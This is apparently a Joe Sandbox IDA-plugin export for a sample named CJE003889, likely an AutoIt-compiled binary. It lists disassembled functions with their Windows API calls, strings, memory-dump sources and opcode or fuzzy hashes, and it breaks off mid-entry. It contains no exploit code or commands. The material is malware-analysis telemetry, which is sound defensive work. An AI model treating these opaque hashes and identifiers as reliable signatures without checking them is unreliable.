Instruction Fuzzy Hash: 34219F32500258ABDF218FA5DC86FEA3B79EB48724F110214FE156B1D0DA75AD919BA0

Function 00CE7B93 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00CE7C4A
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00CE7C58
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00CE7C5F

Strings

msctls_updown32, xrefs: 00CE7BC4

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: f8474d36a96bf27ebe299f65f1f55d329d64a61224f47f758f06fed64306d322
Instruction ID: b5e5fe6dc4cfb681283ea6cbf421daebb287c6379ba63ce3d12c5a669f1a2a19
Opcode Fuzzy Hash: f8474d36a96bf27ebe299f65f1f55d329d64a61224f47f758f06fed64306d322
Instruction Fuzzy Hash: E1217AB1204289AFDB10DF29DCC1DBB77ACEB5A354B140559FA119B3A1CB71ED019AB0

Function 00CE6CB0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00CE6D3B
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00CE6D4B
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00CE6D70

Strings

Listbox, xrefs: 00CE6D08

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 3372b3a685cbc2b0d4297fd55b4f74e8d1f8abb1430ee237675fddb9419a0f45
Instruction ID: 3f0ef3fee0e8d417872c828bea7f4fde67df0fe1b1df8d90fea0cf5ec4d6ab55
Opcode Fuzzy Hash: 3372b3a685cbc2b0d4297fd55b4f74e8d1f8abb1430ee237675fddb9419a0f45
Instruction Fuzzy Hash: E3210432210158BFDF218F55CC81FBF3BBAEF997A0F108128F9509B1A0CA719D5187A0

Function 00CE770E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00CE7772
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00CE7787
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00CE7794

Strings

msctls_trackbar32, xrefs: 00CE7749

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: a34ae7301c5792764c24bf82b456abb1f1952ad6f4271aad61a430189e45e28f
Instruction ID: d810cb24b300066b066d68c5b776ec018fa622b5d15935c297f95375552eceec
Opcode Fuzzy Hash: a34ae7301c5792764c24bf82b456abb1f1952ad6f4271aad61a430189e45e28f
Instruction Fuzzy Hash: DF113A72244248BFEF215F62CC41FEB776CEF88B54F010218FA5196090C671E851DB20

Function 00C64C03 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00C64BD0,?,00C64DEF,?,00D252F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00C64C11
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00C64C23

Strings

kernel32.dll, xrefs: 00C64C0C
Wow64DisableWow64FsRedirection, xrefs: 00C64C1D

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 2574300362-3689287502
Opcode ID: fb9a6ed4a2eb72df4a6b5afef936021daf4723f9f899f3df964b94b9a799b37a
Instruction ID: a433fbf9b44c83c55b646197dc504f9c49bd63a20729cd7ffb87dd8da12a0aac
Opcode Fuzzy Hash: fb9a6ed4a2eb72df4a6b5afef936021daf4723f9f899f3df964b94b9a799b37a
Instruction Fuzzy Hash: D5D01231511713DFD7205F71D98874FB6D6EF09351B11CC3D9495DA250E6B4D481C650

Function 00C64C36 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00C64B83,?), ref: 00C64C44
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00C64C56

Strings

kernel32.dll, xrefs: 00C64C3F
Wow64RevertWow64FsRedirection, xrefs: 00C64C50

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2574300362-1355242751
Opcode ID: 217967c58d5cac37766d3917d2496f35790206e84c5d2e539e1bad52827d2a62
Instruction ID: 63b8affef5e5b2d0472537bef0965799ca8885d5f4ed5069949d0ee564e0334e
Opcode Fuzzy Hash: 217967c58d5cac37766d3917d2496f35790206e84c5d2e539e1bad52827d2a62
Instruction Fuzzy Hash: F5D01731510B13EFD7289F32E98874E7AE6AF05351B11C83ED4A6DA264EA74D880CA60

Function 00CE0DE7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,00CE1039), ref: 00CE0DF5
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00CE0E07

Strings

advapi32.dll, xrefs: 00CE0DF0
RegDeleteKeyExW, xrefs: 00CE0E01

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2574300362-4033151799
Opcode ID: ba2790270d9add5cfa9e4dfdca2df8b055f146a02c86fb266fe03fd6ac30a3c3
Instruction ID: 105a8d28e18df968c24f3bfb86a6713abd061b00d7823174fc6e1760508c7631
Opcode Fuzzy Hash: ba2790270d9add5cfa9e4dfdca2df8b055f146a02c86fb266fe03fd6ac30a3c3
Instruction Fuzzy Hash: 15D0C271400716DFD3204FB1D85838AB2D6AF00341F108C3D94D2D6150DAB0D4D0C650

Function 00CD90E0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000001,00CD8CF4,?,00CEF910), ref: 00CD90EE
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00CD9100

Strings

kernel32.dll, xrefs: 00CD90E9
GetModuleHandleExW, xrefs: 00CD90FA

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 2574300362-199464113
Opcode ID: bd41b7b2a4d2c4f3715f507a292f074f213e3f7c3c5ba9dd0d0cea511d7ca0af
Instruction ID: 1453c7f9bcab42786486eb9421ab6307a4f03c597f25674ce9d9306955d22854
Opcode Fuzzy Hash: bd41b7b2a4d2c4f3715f507a292f074f213e3f7c3c5ba9dd0d0cea511d7ca0af
Instruction Fuzzy Hash: 5FD01739510713DFDB209F31D85874E76E4AF05351B12C83EA59ADA690EA70C881DAA0

Function 00CA1714 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00CA1718
__swprintf.LIBCMT ref: 00CA1749

Strings

%.3d, xrefs: 00CA1723
WIN_XPe, xrefs: 00CA1788

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: LocalTime__swprintf
String ID: %.3d$WIN_XPe
API String ID: 2070861257-2409531811
Opcode ID: 2d3c0514707716bed3ff4a78473701cd6e8af785c68ff3ca4b892f2c4905183b
Instruction ID: 95ef5647004724943d1b52338dacb1bd0abde396074e11856f5d14657d17ce2c
Opcode Fuzzy Hash: 2d3c0514707716bed3ff4a78473701cd6e8af785c68ff3ca4b892f2c4905183b
Instruction Fuzzy Hash: BDD0177584425AFACB119A92E8D89F9737CAB0A709F182462BD06E2040E2219BD4EA25

Function 00CB717D Relevance: 6.3, APIs: 4, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3cdaaf56074c1d4b5b8b6a51238490890a674ab94cc20ce91fbc74e52d2ce64d
Instruction ID: 1aa7d6baba6c22084c8b9e889aa395f09ff1da04cc89da0aaf96cd4d424b6fed
Opcode Fuzzy Hash: 3cdaaf56074c1d4b5b8b6a51238490890a674ab94cc20ce91fbc74e52d2ce64d
Instruction Fuzzy Hash: F3C12C75A04216EFCB14CFA4C884AAEBBB5FF88714F158698EC15EB251D730DE81DB90

Function 00CDE02A Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 00CDE0BE
CharLowerBuffW.USER32(?,?), ref: 00CDE101

Part of subcall function 00CDD7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00CDD7C5

VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00CDE301
_memmove.LIBCMT ref: 00CDE314

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: BuffCharLower$AllocVirtual_memmove
String ID:
API String ID: 3659485706-0
Opcode ID: 8c222fe84a7c5c014386190aa75d994ef18035f8ccbcb76ec4362058e9b15365
Instruction ID: d2f5ce1229bdd317f279c12655956266248dff9aba4465df9d1ffb9c1da915b0
Opcode Fuzzy Hash: 8c222fe84a7c5c014386190aa75d994ef18035f8ccbcb76ec4362058e9b15365
Instruction Fuzzy Hash: 86C12971604301DFC754EF28C480A6ABBE4FF89718F14896EF9999B351D731EA46CB82

Function 00CD8093 Relevance: 6.3, APIs: 4, Instructions: 267COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00CD80C3
CoUninitialize.OLE32 ref: 00CD80CE

Part of subcall function 00CBD56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00CBD5D4

VariantInit.OLEAUT32(?), ref: 00CD80D9
VariantClear.OLEAUT32(?), ref: 00CD83AA

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
String ID:
API String ID: 780911581-0
Opcode ID: f30fd27b323d3018d17f5a5c0ee34b94fc18fa7cba8c8a56bcdd71f8bd8a1b7d
Instruction ID: 7a1a3ff92ffd19a29314548157627d0977ccf58b68f85c9468a148d50207e857
Opcode Fuzzy Hash: f30fd27b323d3018d17f5a5c0ee34b94fc18fa7cba8c8a56bcdd71f8bd8a1b7d
Instruction Fuzzy Hash: 7AA146756047019FCB10DF65C881B2AB7E8FF89754F148459FA9A9B3A1CB30ED09DB82

Function 00CB7530 Relevance: 6.2, APIs: 4, Instructions: 231COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00CF2C7C,?), ref: 00CB76EA
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00CF2C7C,?), ref: 00CB7702
CLSIDFromProgID.OLE32(?,?,00000000,00CEFB80,000000FF,?,00000000,00000800,00000000,?,00CF2C7C,?), ref: 00CB7727
_memcmp.LIBCMT ref: 00CB7748

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: 6ab3850ca12f41db54c3a3e8ed7bc8df43d32d3dbb3b354c79949b72d6b410be
Instruction ID: aa6964bdef39185c602c4e8d7f980c4c8cd385382700ca91b6d5de443ba21695
Opcode Fuzzy Hash: 6ab3850ca12f41db54c3a3e8ed7bc8df43d32d3dbb3b354c79949b72d6b410be
Instruction Fuzzy Hash: A4811C75A00109EFCB04DFA4C984EEEB7B9FF89315F204558F916AB250DB71AE46CB60

Function 00CB687D Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00CB688E
SysAllocString.OLEAUT32(00000000), ref: 00CB6937
VariantCopy.OLEAUT32 ref: 00CB6966
VariantClear.OLEAUT32(?), ref: 00CB698D

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: Variant$AllocClearCopyInitString
String ID:
API String ID: 2808897238-0
Opcode ID: d840a02099a784eaf6a165d0f365b5bd8b61fa8d3c8de4ec7a4ce3a65eb8a666
Instruction ID: 9384dfe67dc8cd5b66c807d64991923c88b9322481ebf7f65431a645f9cf98e5
Opcode Fuzzy Hash: d840a02099a784eaf6a165d0f365b5bd8b61fa8d3c8de4ec7a4ce3a65eb8a666
Instruction Fuzzy Hash: 4D5191747003019ADF24AF66D891BBEB3E9EF45310F20D81FE596DB291DB78D884AB05

Function 00CE97F4 Relevance: 6.1, APIs: 4, Instructions: 140COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(00F9E7F0,?), ref: 00CE9863
ScreenToClient.USER32(00000002,00000002), ref: 00CE9896
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00CE9903

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: 07adb82c337806d4722919f42137fd68c3588242429911b381601743b87d48db
Instruction ID: 441bdda327b6579d5603b1d08cc26efe2b42ea243bf9a7889c37afcf7595a974
Opcode Fuzzy Hash: 07adb82c337806d4722919f42137fd68c3588242429911b381601743b87d48db
Instruction Fuzzy Hash: D5514D34A00249EFCF20CF65D881AAE7BB5FF55360F14816DF8699B2A1D770AE41CB90

Function 00CB9A80 Relevance: 6.1, APIs: 4, Instructions: 129windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00CB9AD2
__itow.LIBCMT ref: 00CB9B03

Part of subcall function 00CB9D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00CB9DBE

SendMessageW.USER32(?,0000110A,00000001,?), ref: 00CB9B6C
__itow.LIBCMT ref: 00CB9BC3

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: MessageSend$__itow
String ID:
API String ID: 3379773720-0
Opcode ID: d74203e94ef22e6a49da076cb81b0b2fd6ed4defc4764c2bdee654ef7d87d2a1
Instruction ID: bf82ff94c0bc94997c3bbe2bcd15b3739e730e623d99af7d0242e1398a0c0070
Opcode Fuzzy Hash: d74203e94ef22e6a49da076cb81b0b2fd6ed4defc4764c2bdee654ef7d87d2a1
Instruction Fuzzy Hash: 8941A174A00208ABDF21EF64D885BFE7BB9EF44754F000469FA15A7291DB709E44DBA1

Function 00CD69AA Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 00CD69D1
WSAGetLastError.WSOCK32(00000000), ref: 00CD69E1

Part of subcall function 00C69837: __itow.LIBCMT ref: 00C69862
Part of subcall function 00C69837: __swprintf.LIBCMT ref: 00C698AC

#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00CD6A45
WSAGetLastError.WSOCK32(00000000), ref: 00CD6A51

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: ErrorLast$__itow__swprintfsocket
String ID:
API String ID: 2214342067-0
Opcode ID: b89175412b6d2c2a842c78c9073a2d0fb7099befc9e2b8e980de545ae7bab8f8
Instruction ID: b0e12aecc79db3a542124ac8bfee4a1237aa7f3434a373eb2b76998bf6db1ab4
Opcode Fuzzy Hash: b89175412b6d2c2a842c78c9073a2d0fb7099befc9e2b8e980de545ae7bab8f8
Instruction Fuzzy Hash: E8419D75640200AFEB60AF64CCC6F2A77E8DF18B14F048119FA59AF3C2DB709D01AB91

Function 00CD641A Relevance: 6.1, APIs: 4, Instructions: 116COMMON

Download Yara Rule

APIs

#16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00CEF910), ref: 00CD64A7
_strlen.LIBCMT ref: 00CD64D9

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-0
Opcode ID: 86b434f7deba66d1d0fd1189366af92f869645efb5c96a6134f4bd25f018a6a7
Instruction ID: fae92224630011d1135c942c576f9fa9f48dc5a15c14d853366e8b567679af93
Opcode Fuzzy Hash: 86b434f7deba66d1d0fd1189366af92f869645efb5c96a6134f4bd25f018a6a7
Instruction Fuzzy Hash: 2041B771500104AFCB24EFA4ECD5FAEB7A9EF54310F14815AFA1997392EB30AE45DB50

Function 00CCB7F4 Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00CCB89E
GetLastError.KERNEL32(?,00000000), ref: 00CCB8C4
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00CCB8E9
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00CCB915

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
